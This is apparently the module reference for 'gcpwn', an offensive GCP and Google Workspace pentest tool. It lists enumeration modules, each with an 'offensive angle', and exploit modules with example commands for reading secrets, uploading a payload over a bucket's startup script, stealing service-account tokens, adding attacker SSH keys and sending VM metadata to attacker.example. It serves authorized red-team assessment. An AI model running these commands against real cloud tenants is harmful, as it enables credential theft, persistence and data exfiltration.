  • What It Does: Enumerates Cloud Run services and jobs across regions, exposing each workload's runtime service account and trigger URL. --download lists+gets service revisions and writes their ENV YAML (run.revisions.list/get), which frequently leaks secrets and config.
  • Key Flags: Component selectors --services / --jobs; manual --service-ids / --job-ids; region scope --all-regions | --regions-list | --regions-file; --get; --iam (services and jobs); --download (revision ENV YAML). Run modules run enum_cloudrun -h for full options.
  • Example:
    modules run enum_cloudrun --services --jobs --all-regions --download
    gcpwn --module enum_cloudrun --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --services --jobs --all-regions --download

enum_cloudsql

  • Service Group: Cloud SQL
  • What It Does: Enumerates Cloud SQL instances (project-scoped) and their databases and users, plus post-processed connection and config views over cached instances. Surfaces DB users, public-IP/authorized-network exposure, and connection details for direct database access.
  • Key Flags: Component selectors --instances / --databases / --users; view flags --connections / --configs; manual --instance-names; --get. Run modules run enum_cloudsql -h for full options.
  • Example:
    modules run enum_cloudsql --instances --databases --users --connections --configs
    gcpwn --module enum_cloudsql --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --databases --users --connections --configs

enum_cloudstorage

  • Service Group: Cloud Storage
  • What It Does: Enumerates Cloud Storage HMAC keys, buckets, and their blobs (standard API or HMAC/XML access mode), and can download blob contents. HMAC key secrets and bucket contents are prime loot; recovered HMAC credentials enable S3-compatible bucket access outside normal IAM.
  • Key Flags: Component selectors --hmac_keys / --buckets / --blobs; manual --access-keys / --bucket-names / --blob-names(-file); HMAC access via --access-id + --hmac-secret (and --list-hmac-secrets); --get; --iam (buckets); --download with --output / --file-size / --good-regex / --time-limit / --threads. Run modules run enum_cloudstorage -h for full options.
  • Example:
    modules run enum_cloudstorage --buckets --blobs --download --good-regex '.*\.(env|json|pem)$' --output loot/
    gcpwn --module enum_cloudstorage --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --buckets --blobs --download --good-regex '.*\.(env|json|pem)$' --output loot/

enum_cloudtasks

  • Service Group: Cloud Tasks
  • What It Does: Enumerates Cloud Tasks queues and the tasks within them per project+location, with optional download of each HTTP/App Engine task's request payload; the offensive angle is that tasks carry target URLs, headers, bodies, and the OIDC/OAuth service account a queue dispatches requests as.
  • Key Flags: Component selectors --queues / --tasks (tasks nest under queues); region scope --all-regions | --regions-list | --regions-file; --get, --iam, --download (task request bodies to loot), --output; manual --queue-ids / --queue-ids-file. Run modules run enum_cloudtasks -h for full options.
  • Example:
    modules run enum_cloudtasks --queues --tasks --all-regions --iam --download
    gcpwn --module enum_cloudtasks --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --queues --tasks --all-regions --iam

enum_firestore

  • Service Group: Firestore
  • What It Does: Enumerates Firestore databases and top-level collections (and optionally security-rules metadata) for the current project, and can download collection documents. Exposes app data and rule misconfigurations that may permit unauthorized reads/writes.
  • Key Flags: component selectors --databases/--collections (default: all), --rules (security rules metadata), manual --database-ids/--database-ids-file, --download (fetch collection documents; implies --collections), --download-limit N (0 = unlimited), --get, -v/--debug. Run modules run enum_firestore -h for full options.
  • Example:
    modules run enum_firestore --databases --rules --get
    gcpwn --module enum_firestore --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --databases --rules --get

enum_gke

  • Service Group: GKE
  • What It Does: Enumerates GKE (Container API) clusters and their node pools per location. Reveals cluster config and the node-pool service accounts / metadata that are common Kubernetes-to-GCP privilege-escalation footholds.
  • Key Flags: component selectors --clusters/--node-pools (default: all), region scope --all-regions | --regions-list <csv> | --regions-file <file>, manual --cluster-names (LOCATION/CLUSTER_ID or full name) / --node-pool-names, --get, -v/--debug. Run modules run enum_gke -h for full options.
  • Example:
    modules run enum_gke --clusters --node-pools --regions-list us-central1
    gcpwn --module enum_gke --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --node-pools --regions-list us-central1

enum_iam

  • Service Group: IAM
  • What It Does: Enumerates IAM service accounts (and per-SA keys), custom roles (project AND resolved-org scope), and Workload Identity Federation pools/providers — the SA principals and keys here are prime targets for impersonation/key theft, and WIF providers reveal external trust relationships. Optionally runs TestIamPermissions on service accounts.
  • Key Flags: component selectors --service-accounts/--custom-roles/--pools/--providers (default all); manual ids --sa-account-names (projects/<pid>/serviceAccounts/<email>), --role-names/--role-names-file; --project/--org to scope custom-role enumeration; --iam (TestIamPermissions on SAs); --get (fetch full SA keys / role definitions); -v/--debug. Run modules run enum_iam -h for full options.
  • Example:
    modules run enum_iam --service-accounts --get --iam
    gcpwn --module enum_iam --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --service-accounts --get --iam

enum_kms

  • Service Group: Cloud KMS
  • What It Does: Enumerates the Cloud KMS hierarchy per region: keyrings, then crypto keys, then key versions. Discovered keys plus IAM checks reveal encrypt/decrypt/sign reach, a path to decrypting protected data or escalating via key-level bindings.
  • Key Flags: Component selectors --keyrings / --keys / --versions; region scope --all-regions | --regions-list | --regions-file; --get; --iam (keyrings and keys). Run modules run enum_kms -h for full options.
  • Example:
    modules run enum_kms --keyrings --keys --versions --all-regions --iam
    gcpwn --module enum_kms --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --keyrings --keys --versions --all-regions --iam

enum_memorystore

  • Service Group: Memorystore
  • What It Does: Enumerates Memorystore for Redis instances (redis_v1) and Redis Clusters (distinct redis_cluster_v1 API) across regions, capturing host/port, state, and — notably — auth_enabled and the actual auth_string, exposing usable Redis credentials and reachable endpoints.
  • Key Flags: component selectors --instances/--clusters (default both); region scope --all-regions | --regions-list r1,r2 | --regions-file <file>; manual ids --redis-instance-names (projects/<pid>/locations/<loc>/instances/<name>), --redis-cluster-names (LOCATION/CLUSTER_ID or full path); --get; -v/--debug. Run modules run enum_memorystore -h for full options.
  • Example:
    modules run enum_memorystore --instances --regions-list us-central1
    gcpwn --module enum_memorystore --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --regions-list us-central1

enum_gcp_policy_bindings

  • Service Group: Everything
  • What It Does: Enumerates IAM allow-policy bindings across already-cached resources (org/folder/project nodes plus per-service resources), capturing raw allow-policy JSON and normalized bindings and rebuilding the principal/member permission view. This is the data that drives who-can-do-what and privilege-escalation analysis.
  • Key Flags: per-service selectors --resource-manager/--storage/--bigquery/--functions/--compute/--service-accounts/--secrets/--cloud-run/--cloud-tasks/--artifact-registry/--cloud-kms/--pubsub/--service-directory (default: all), --ensure-tree (auto-run resource discovery if hierarchy missing), scope group --scope-hierarchy/--scope-project <pid>/--scope-orphans, --no-sync-users, -v/--debug. Run modules run enum_gcp_policy_bindings -h for full options.
  • Example:
    modules run enum_gcp_policy_bindings --ensure-tree
    gcpwn --module enum_gcp_policy_bindings --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --ensure-tree

enum_pubsub

  • Service Group: Pub/Sub
  • What It Does: Enumerates Pub/Sub topics, subscriptions, schemas, and snapshots in a project, recording each resource's KMS key, subscription filters/target topics, and optional TestIamPermissions results. Offensive angle: exposes messaging pipelines and their CMEK bindings, and subscriptions let you identify data flows you may be able to pull or hijack.
  • Key Flags: Component selectors --topics, --subscriptions, --schemas, --snapshots (each with a manual-id arg: --topic-names, --subscription-names, --schema-names, --snapshot-names); --get for per-resource detail; --iam to run TestIamPermissions; --debug. Run modules run enum_pubsub -h for full options.
  • Example:
    modules run enum_pubsub --topics --subscriptions --iam
    gcpwn --module enum_pubsub --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --topics --subscriptions --iam

enum_resources

  • Service Group: Resource Manager
  • What It Does: Enumerates the GCP resource hierarchy (organizations, folders, projects) via search plus recursive list calls, building the org/folder/project tree and syncing discovered projects into the workspace. Offensive angle: maps the whole hierarchy for lateral movement/scoping and can brute-force the full TestIamPermissions catalog at org/folder/project scope to inventory your effective permissions.
  • Key Flags: Component selectors --organizations, --folders, --projects; --iam (TestIamPermissions per resource); --all-permissions (test the larger permission catalog); --record-failed-permissions (force per-permission checks and write reusable failed-permission lists to scripts/); --no-recursive (skip recursive hierarchy walk); --get (fetch details and resolve missing parent names); --debug. Run modules run enum_resources -h for full options.
  • Example:
    modules run enum_resources --organizations --folders --projects --iam
    gcpwn --module enum_resources --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --organizations --folders --projects --iam

enum_secretsmanager

  • Service Group: Secrets
  • What It Does: Enumerates Secret Manager secrets and their versions, and can access/exfiltrate the actual secret payloads. Offensive angle: --values/--download calls AccessSecretVersion to read plaintext credentials, API keys, and other secrets, storing/downloading them locally.
  • Key Flags: Component selectors --secrets, --versions (versions auto-enable when values/download requested); --values (read secret payloads, sensitive); --download (write secret values to local files); --iam (TestIamPermissions on secrets and versions); --get; --debug; reserved --version-range. Run modules run enum_secretsmanager -h for full options.
  • Example:
    modules run enum_secretsmanager --secrets --values --download
    gcpwn --module enum_secretsmanager --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --secrets --values --download

enum_servicedirectory

  • Service Group: Service Directory
  • What It Does: Enumerates Service Directory namespaces, services, and endpoints per region, capturing endpoint addresses, ports, and network bindings. Offensive angle: endpoint records reveal internal service network locations (IP/port/network) usable for lateral movement and reconnaissance.
  • Key Flags: Component selectors --namespaces, --services, --endpoints; region scope --all-regions | --regions-list us-central1,us-east1 | --regions-file; --iam (TestIamPermissions on namespaces and services; endpoints unsupported); --get; --debug. Run modules run enum_servicedirectory -h for full options.
  • Example:
    modules run enum_servicedirectory --namespaces --services --endpoints --regions-list us-central1
    gcpwn --module enum_servicedirectory --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --namespaces --services --endpoints --regions-list us-central1

enum_storagetransfer

  • Service Group: Storage Transfer
  • What It Does: Enumerates Storage Transfer Service jobs for a project, capturing job configs and their latest operation. Offensive angle: transfer jobs expose source/sink data movement configurations (e.g. bucket-to-bucket copy paths) useful for data-exfiltration reconnaissance.
  • Key Flags: Component selector --transfer-jobs with manual-id arg --transfer-job-ids (short my-job or full projects/PID/transferJobs/my-job); --get; --download (reserved, not yet implemented); --debug. No --iam support. Run modules run enum_storagetransfer -h for full options.
  • Example:
    modules run enum_storagetransfer --transfer-jobs --get
    gcpwn --module enum_storagetransfer --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --transfer-jobs --get

enum_cloudscheduler

  • Service Group: Cloud Scheduler
  • What It Does: Enumerates Cloud Scheduler jobs across locations, capturing each job's target and the service account email it authenticates as. Offensive angle: scheduler jobs run as a service account and fire HTTP/Pub/Sub targets, so a hijacked job can invoke arbitrary endpoints with that SA's identity.
  • Key Flags: Component selector --jobs with manual-id arg --job-ids (LOCATION/JOB_ID or full name); region/location scope --all-regions | --regions-list us-central1,europe-west1 | --regions-file; --get; --debug. No --iam support. Run modules run enum_cloudscheduler -h for full options.
  • Example:
    modules run enum_cloudscheduler --jobs --regions-list us-central1
    gcpwn --module enum_cloudscheduler --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --jobs --regions-list us-central1

enum_cloudworkflows

  • Service Group: Cloud Workflows
  • What It Does: Enumerates Cloud Workflows workflows across locations, capturing state, revision, call log level, CMEK key, and the service account each workflow runs as. Offensive angle: a workflow executes as its service_account, so control over a workflow yields that SA's identity for privilege escalation/lateral movement.
  • Key Flags: Component selector --workflows with manual-id arg --workflow-ids (LOCATION/WORKFLOW_ID or full name); region/location scope --all-regions | --regions-list us-central1 | --regions-file; --get; --debug. No --iam support. Run modules run enum_cloudworkflows -h for full options.
  • Example:
    modules run enum_cloudworkflows --workflows --regions-list us-central1
    gcpwn --module enum_cloudworkflows --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --workflows --regions-list us-central1

enum_spanner

  • Service Group: Cloud Spanner
  • What It Does: Enumerates Cloud Spanner instances and their databases in a project (read-only). Offensive angle: inventories managed relational databases and lets you test IAM permissions against instances/databases to identify data-access opportunities.
  • Key Flags: Component selectors --instances (manual-id --instance-ids), --databases (manual-id --database-ids, INSTANCE_ID/DATABASE_ID or full name); --iam (TestIamPermissions on instances and databases); --get; --debug. Run modules run enum_spanner -h for full options.
  • Example:
    modules run enum_spanner --instances --databases --iam
    gcpwn --module enum_spanner --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --databases --iam

enum_alloydb

  • Service Group: AlloyDB
  • What It Does: Enumerates AlloyDB clusters and their instances across locations. Offensive angle: inventories managed PostgreSQL-compatible clusters/instances (and their network/config metadata) for data-access reconnaissance.
  • Key Flags: Component selectors --clusters (manual-id --cluster-ids, LOCATION/CLUSTER_ID), --instances (manual-id --instance-ids, LOCATION/CLUSTER_ID/INSTANCE_ID); region/location scope --all-regions | --regions-list us-central1 | --regions-file; --get; --debug. No --iam support. Run modules run enum_alloydb -h for full options.
  • Example:
    modules run enum_alloydb --clusters --instances --regions-list us-central1
    gcpwn --module enum_alloydb --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --instances --regions-list us-central1

enum_orgpolicy

  • Service Group: Organization Policy
  • What It Does: Enumerates the Organization Policy constraints in effect on the project (each stored with a rule summary), surfacing which guardrails are set or missing (e.g. whether iam.disableServiceAccountKeyCreation or compute.requireOsLogin are enforced) to gauge priv-esc opportunities.
  • Key Flags: --policies component selector; --get; manual ids --policy-ids CONSTRAINT (or full projects/PROJECT_ID/policies/CONSTRAINT). Project-scoped, no region flags (supports_iam=False). Run modules run enum_orgpolicy -h for full options.
  • Example:
    modules run enum_orgpolicy --policies
    gcpwn --module enum_orgpolicy --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --policies

enum_asset_inventory

  • Service Group: Cloud Asset Inventory
  • What It Does: Runs a single Cloud Asset Inventory list_assets scan (RESOURCE + IAM_POLICY) over a project/folder/org scope and fans the results into the shared workspace tables (iam_allow_policies, abstract_tree_hierarchy, service accounts/keys/roles, compute instances, WIF pools/providers) — a force-multiplier that feeds OpenGraph and a fallback when per-service enum is denied but cloudasset.* is granted.
  • Key Flags: --scope projects/<id>|folders/<id>|organizations/<id> (default current project); --asset-types compute.googleapis.com/Instance,... comma-separated filter; -v/--debug. No component/region flags. Run modules run enum_asset_inventory -h for full options.
  • Example:
    modules run enum_asset_inventory --scope organizations/1234567890
    gcpwn --module enum_asset_inventory --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --scope organizations/1234567890

enum_eventarc

  • Service Group: Eventarc
  • What It Does: Enumerates Eventarc triggers per region, capturing each trigger's service_account — the identity a trigger invokes its destination as — plus its event filters/destination, surfacing an impersonation/priv-esc target.
  • Key Flags: --triggers component selector; region scope --all-regions | --regions-list us-central1,europe-west1 | --regions-file <file>; --get; manual ids --trigger-ids LOCATION/TRIGGER_ID. Run modules run enum_eventarc -h for full options.
  • Example:
    modules run enum_eventarc --triggers --all-regions
    gcpwn --module enum_eventarc --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --triggers --all-regions

enum_workstations

  • Service Group: Cloud Workstations
  • What It Does: Enumerates Cloud Workstations clusters (regional), then the configs under each cluster and the workstations under each config (nested), capturing each config's host.gce_instance.service_account — the identity dev workstations run as and a priv-esc target.
  • Key Flags: --clusters / --configs / --workstations component selectors (configs/workstations are nested under their parents); region scope --all-regions | --regions-list us-central1 | --regions-file <file>; --iam (TestIamPermissions on configs/workstations); --get. Run modules run enum_workstations -h for full options.
  • Example:
    modules run enum_workstations --clusters --configs --workstations --all-regions --iam
    gcpwn --module enum_workstations --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --configs --workstations --all-regions --iam

enum_billing

  • Service Group: Cloud Billing
  • What It Does: Lists accessible (global, non-project-scoped) Cloud Billing accounts with a best-effort IAM admin member list per account, plus the current project's billing link/enabled state — surfacing billing admins who can attach/move project billing as a quiet privilege path.
  • Key Flags: -v/--debug only (no component/region/iam flags). Run modules run enum_billing -h for full options.
  • Example:
    modules run enum_billing
    gcpwn --module enum_billing --workspace WORKSPACE_NAME --cred CRED_NAME --current-project

enum_cloudshell

  • Service Group: Cloud Shell
  • What It Does: Fetches the calling principal's (per-user) Cloud Shell environment — SSH public keys, docker image, and host state — and persists it. Cloud Shell has no list API; service-account creds usually return 404/403 (handled gracefully), so this is most useful with user credentials.
  • Key Flags: --environment users/me/environments/default (override the environment resource name); -v/--debug. Run modules run enum_cloudshell -h for full options.
  • Example:
    modules run enum_cloudshell
    gcpwn --module enum_cloudshell --workspace WORKSPACE_NAME --cred CRED_NAME --current-project

enum_logging

  • Service Group: Cloud Logging
  • What It Does: Lists the project's log 'groups' — sinks (with their export destination and writer_identity SA), log buckets, log names, and log-based metrics — and can optionally download the newest entries per log to JSON, exposing exfil paths (sink writer SAs) and sensitive log content.
  • Key Flags: --download (fetch recent entries instead of just listing) with --download-limit N (default 1000, per log), --logs name1,name2 to target specific logs, --output <dir>; -v/--debug. Run modules run enum_logging -h for full options.
  • Example:
    modules run enum_logging --download --download-limit 500
    gcpwn --module enum_logging --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --download --download-limit 500

enum_dataproc

  • Service Group: Dataproc
  • What It Does: Enumerates Dataproc clusters and Dataproc Serverless batches per region, capturing the service account each runs as (gce_cluster_config.service_account / execution_config.service_account) — the impersonation/priv-esc target for jobs submitted to them.
  • Key Flags: --clusters / --batches component selectors; region scope --all-regions | --regions-list us-central1,us-east1 | --regions-file <file>; -v/--debug (components have supports_get=False, supports_iam=False). Run modules run enum_dataproc -h for full options.
  • Example:
    modules run enum_dataproc --clusters --batches --all-regions
    gcpwn --module enum_dataproc --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --batches --all-regions

enum_dataflow

  • Service Group: Dataflow
  • What It Does: Enumerates Dataflow jobs per region, capturing each job's worker service account (environment.service_account_email) — the identity pipeline workers run as and an impersonation/priv-esc target — along with job type and current state.
  • Key Flags: --jobs component selector; region scope --all-regions | --regions-list us-central1 | --regions-file <file>; -v/--debug (supports_get=False, supports_iam=False). Run modules run enum_dataflow -h for full options.
  • Example:
    modules run enum_dataflow --jobs --all-regions
    gcpwn --module enum_dataflow --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --jobs --all-regions

enum_notebooks

  • Service Group: Vertex AI Workbench
  • What It Does: Enumerates Vertex AI Workbench instances (notebooks_v2), capturing each instance's proxy_uri, creator, and — the key offensive signal — the run-as service account from gce_setup.service_accounts[0].email. A principal who can create/update/SSH/proxy into an instance effectively acts as that SA.
  • Key Flags: --instances (component selector), --instance-ids LOCATION/INSTANCE_ID (manual ids), region scope via --all-regions | --regions-list us-central1,us-east1 | --regions-file <path>, --get, --iam (per-instance testIamPermissions). Run modules run enum_notebooks -h for full options.
  • Example:
    modules run enum_notebooks --instances --regions-list us-central1 --iam
    gcpwn --module enum_notebooks --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --regions-list us-central1 --iam

enum_clouddeploy

  • Service Group: Cloud Deploy
  • What It Does: Enumerates Cloud Deploy delivery pipelines and targets (deploy_v1), recording each target's destination runtime (gke/run/anthos/...) and its ExecutionConfig service_account. Rollouts run as that SA, so a principal able to modify targets/pipelines gains a deploy-as-SA primitive.
  • Key Flags: component selectors --delivery-pipelines / --targets, manual ids --pipeline-ids LOCATION/PIPELINE_ID / --target-ids LOCATION/TARGET_ID, region scope via --all-regions | --regions-list us-central1 | --regions-file <path>, --get, --iam (per-resource testIamPermissions). Run modules run enum_clouddeploy -h for full options.
  • Example:
    modules run enum_clouddeploy --targets --regions-list us-central1 --iam
    gcpwn --module enum_clouddeploy --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --targets --regions-list us-central1 --iam

enum_bigquerydatatransfer

  • Service Group: BigQuery Data Transfer
  • What It Does: Enumerates BigQuery Data Transfer Service transfer configs (bigquery_datatransfer_v1), surfacing recon-rich metadata: data_source_id (what external data is pulled), destination_dataset_id (where it lands), schedule, and owner_info.email (as whom). Reveals cross-system data flows and the owning identity.
  • Key Flags: --transfer-configs (component selector), --config-ids LOCATION/CONFIG_ID (manual ids), region scope via --all-regions | --regions-list us-central1 | --regions-file <path>, --get. No --iam (the GAPIC client exposes no testIamPermissions). Run modules run enum_bigquerydatatransfer -h for full options.
  • Example:
    modules run enum_bigquerydatatransfer --transfer-configs --regions-list us-central1 --get
    gcpwn --module enum_bigquerydatatransfer --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --transfer-configs --regions-list us-central1 --get

enum_serviceusage

  • Service Group: Service Usage
  • What It Does: Enumerates the APIs (services) enabled on a project via service_usage_v1 (filter state:ENABLED). Foundational recon: tells you which services are reachable — and thus which other enum modules can return data — and which managed services (e.g. cloudfunctions, run) are live and worth probing for SA-impersonation / deploy-as-SA primitives.
  • Key Flags: --services (component selector). Project-scoped (no region flags). No --get / --iam (supports_get=False, supports_iam=False). Run modules run enum_serviceusage -h for full options.
  • Example:
    modules run enum_serviceusage --services
    gcpwn --module enum_serviceusage --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --services

Workspace Enumeration Modules

These run once (tenant-scoped). A service account needs domain-wide delegation; set the admin subject via the workspace_admin_subject config (configs set workspace_admin_subject admin@your-domain.com) or --impersonate.

enum_cloud_identity

  • Service Group: Google Workspace
  • What It Does: Enumerates Google Workspace / Cloud Identity groups, their memberships (optionally transitive), and Directory API users for a tenant. Maps group membership and identities that feed IAM group-based bindings and lateral-movement paths.
  • Key Flags: component selectors --groups/--memberships/--users (default: all), tenant scope --customer-id C.../--org-id <numeric>/--parent customers/C..., --query (groups.search) / --filter (groups.list), --transitive (nested memberships), --view FULL|BASIC, --page-size, --directory-customer, --impersonate <admin@domain> (SA domain-wide delegation), --get, -v/--debug. Run modules run enum_cloud_identity -h for full options.
  • Example:
    modules run enum_cloud_identity --groups --memberships --customer-id C0xxxxxxx
    gcpwn --module enum_cloud_identity --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --groups --memberships --customer-id C0xxxxxxx

enum_admin_roles

  • Service Group: Google Workspace
  • What It Does: Enumerates Google Workspace admin roles (flagging super-admin and system roles) and their role assignments (who holds each role) via the Admin SDK Directory API. This is the highest attack-path-value Workspace data — it reveals super-admins and privileged delegated admins.
  • Key Flags: component selectors --roles/--assignments (default: all), tenant scope --customer-id C.../--org-id <numeric>/--directory-customer, --user-key <email|id> (filter assignments to one user), --page-size, --impersonate <admin@domain> (SA domain-wide delegation), --get, -v/--debug. Run modules run enum_admin_roles -h for full options.
  • Example:
    modules run enum_admin_roles --roles --assignments --customer-id C0xxxxxxx --impersonate admin@example.com
    gcpwn --module enum_admin_roles --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --roles --assignments --customer-id C0xxxxxxx --impersonate admin@example.com

enum_org_units

  • Service Group: Google Workspace
  • What It Does: Enumerates a Workspace tenant's organizational units via the Admin SDK Directory API (orgunits.list), mapping the OU tree (paths, parents) that governs where users/devices live and how policies apply. Requires a Workspace admin user or a service account with domain-wide delegation.
  • Key Flags: --customer-id C... (Directory customer ID) or --org-id <numeric> to resolve it via Resource Manager; --directory-customer (API customer selector, default my_customer/resolved); --type all|children; --impersonate admin@domain (SA domain-wide delegation, or configs set workspace_admin_subject); --get; -v/--debug. Run modules run enum_org_units -h for full options.
  • Example:
    modules run enum_org_units --customer-id C0xxxxxxx --impersonate admin@acme.com
    gcpwn --module enum_org_units --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --impersonate admin@acme.com

enum_domains

  • Service Group: Google Workspace
  • What It Does: Enumerates the domains registered to a Workspace tenant via the Admin SDK Directory API (domains.list), surfacing primary/verified status — useful for scoping which email domains and identities belong to the target org. Requires a Workspace admin user or a service account with domain-wide delegation.
  • Key Flags: --customer-id C... or --org-id <numeric> to resolve directoryCustomerId via Resource Manager; --directory-customer (default my_customer); --impersonate admin@domain (SA domain-wide delegation, or configs set workspace_admin_subject); --get; -v/--debug. Run modules run enum_domains -h for full options.
  • Example:
    modules run enum_domains --customer-id C0xxxxxxx --impersonate admin@acme.com
    gcpwn --module enum_domains --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --impersonate admin@acme.com

enum_mobile_devices

  • Service Group: Google Workspace
  • What It Does: Enumerates managed mobile devices in a Workspace tenant via the Admin SDK Directory API (mobiledevices.list), returning owner email, model, OS, and status — inventory useful for targeting endpoints and identities. Requires a Workspace admin user or a service account with domain-wide delegation.
  • Key Flags: --customer-id C... (required, or --org-id <numeric> to resolve it); --directory-customer (API selector, default resolved/my_customer); --page-size N; --projection FULL|BASIC; --order-by; --impersonate admin@domain (SA domain-wide delegation); --get; -v/--debug. Run modules run enum_mobile_devices -h for full options.
  • Example:
    modules run enum_mobile_devices --customer-id C0xxxxxxx --projection FULL --impersonate admin@acme.com
    gcpwn --module enum_mobile_devices --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --projection FULL --impersonate admin@acme.com

enum_oauth_tokens

  • Service Group: Google Workspace
  • What It Does: For each Workspace user (all cached workspace_users, or a single --user-key), lists the 3rd-party OAuth applications they have authorized via the Admin SDK Directory API — surfacing over-privileged or anomalous app grants and their scope counts as an attack/persistence surface. Requires Workspace admin creds or SA domain-wide delegation.
  • Key Flags: --user-key user@domain (single user; default is all cached workspace_users); --customer-id C... or --org-id <numeric>; --impersonate admin@domain (SA domain-wide delegation, or configs set workspace_admin_subject); --get; -v/--debug. Run modules run enum_oauth_tokens -h for full options.
  • Example:
    modules run enum_oauth_tokens --impersonate admin@acme.com
    gcpwn --module enum_oauth_tokens --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --user-key victim@acme.com --impersonate admin@acme.com

Exploit Modules

exploit_bucket_upload

  • Service Group: Cloud Storage
  • What It Does: Authenticated write-access abuse: uploads a local file, base64 data string, or STDIN to an arbitrary object path in a target bucket (e.g. overwriting a script/config an app later reads). Supports HMAC (SigV4 XML) auth in addition to the session credential.
  • Key Flags: --bucket and --remote-blob-path (destination), --local-blob-path or --data-string-base64 (payload source), --access-id + --hmac-secret (use an HMAC key instead of the session cred), -v/--debug. Run modules run exploit_bucket_upload -h for full options.
  • Example:
    modules run exploit_bucket_upload --bucket victim-configs --remote-blob-path deploy/startup.sh --local-blob-path ./payload.sh
    gcpwn --module exploit_bucket_upload --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --bucket victim-configs --remote-blob-path deploy/startup.sh --local-blob-path ./payload.sh

exploit_functions_invoke

  • Service Group: Cloud Functions
  • What It Does: Creates/updates and/or invokes a Cloud Function running as an attacker-chosen (or the default editor) service account to exfiltrate that SA's metadata token; with --assume-creds it parses the returned token and adds it as a new usable credential in the workspace. Uploads the bundled codev1v2.zip payload (entry point data_exfil) to an enumerated bucket when no source is given.
  • Key Flags: --function-name projects/.../functions/<n>; --bucket-src gs://.../x.zip; --entry-point; --service-account <email>; version --v1 / --v2; action --create / --update / --invoke; --assume-creds. Run modules run exploit_functions_invoke -h for full options.
  • Example:
    modules run exploit_functions_invoke --create --v2 --function-name projects/proj-id/locations/us-central1/functions/pwn --service-account victim-sa@proj-id.iam.gserviceaccount.com --invoke --assume-creds
    gcpwn --module exploit_functions_invoke --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --create --v2 --function-name projects/proj-id/locations/us-central1/functions/pwn --service-account victim-sa@proj-id.iam.gserviceaccount.com --invoke --assume-creds

exploit_generate_access_token

  • Service Group: IAM
  • What It Does: Mints a short-lived OAuth2 access token for a target service account via iamcredentials.generateAccessToken, either directly (iam.serviceAccounts.getAccessToken) or by walking impersonation/implicit-delegation chains discovered from cached IAM bindings; can then assume the token as a new credential for privilege escalation.
  • Key Flags: mutually exclusive modes --target-sa <sa> (direct token), --delegation <startSA> (step-through chain), --delegation-target <finalSA> (routes ending at a SA), --all-delegation (show every route); -v/--debug. With no flag it prompts interactively for a mode. Run modules run exploit_generate_access_token -h for full options.
  • Example:
    modules run exploit_generate_access_token --target-sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com
    gcpwn --module exploit_generate_access_token --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --target-sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com

exploit_instance_ssh_keys

  • Service Group: Compute
  • What It Does: Adds an attacker SSH public key to Compute metadata to gain SSH access. Project-level metadata grants access to all instances in the project; instance-level targets a single VM (subject to OS Login / block-project-keys settings).
  • Key Flags: --project-level or --instance-level (placement), --instance-name (instance target), --ssh-key / --ssh-key-file and --username (key identity), --brute (extra key-path handling), -v/--debug. Run modules run exploit_instance_ssh_keys -h for full options.
  • Example:
    modules run exploit_instance_ssh_keys --instance-level --instance-name web-1 --ssh-key-file ~/.ssh/id_ed25519.pub --username attacker
    gcpwn --module exploit_instance_ssh_keys --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instance-level --instance-name web-1 --ssh-key-file ~/.ssh/id_ed25519.pub --username attacker

exploit_instance_startup_script

  • Service Group: Compute
  • What It Does: Creates a new instance, or updates an existing one via a stop/start, with a startup script that exfiltrates the VM's metadata (including the attached service account's access token) to a caller-controlled URL — i.e. code execution as the instance's service account.
  • Key Flags: --create-new-instance or --update-via-shutdown (execution path), --instance-name (target/new name), --startup-script-path and --external-url (script + exfil endpoint), --service-account / --no-service-account (identity to attach), -v/--debug. Run modules run exploit_instance_startup_script -h for full options.
  • Example:
    modules run exploit_instance_startup_script --update-via-shutdown --instance-name batch-runner --external-url https://attacker.example/collect
    gcpwn --module exploit_instance_startup_script --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --update-via-shutdown --instance-name batch-runner --external-url https://attacker.example/collect

exploit_service_account_keys

  • Service Group: IAM
  • What It Does: Creates, enables, or disables user-managed service account keys via the IAM Admin API — a newly created key (iam.serviceAccountKeys.create) yields a durable, offline-usable credential for the target SA that can be immediately assumed for persistence/escalation. Enable/disable can also be used to reactivate or tamper with existing keys.
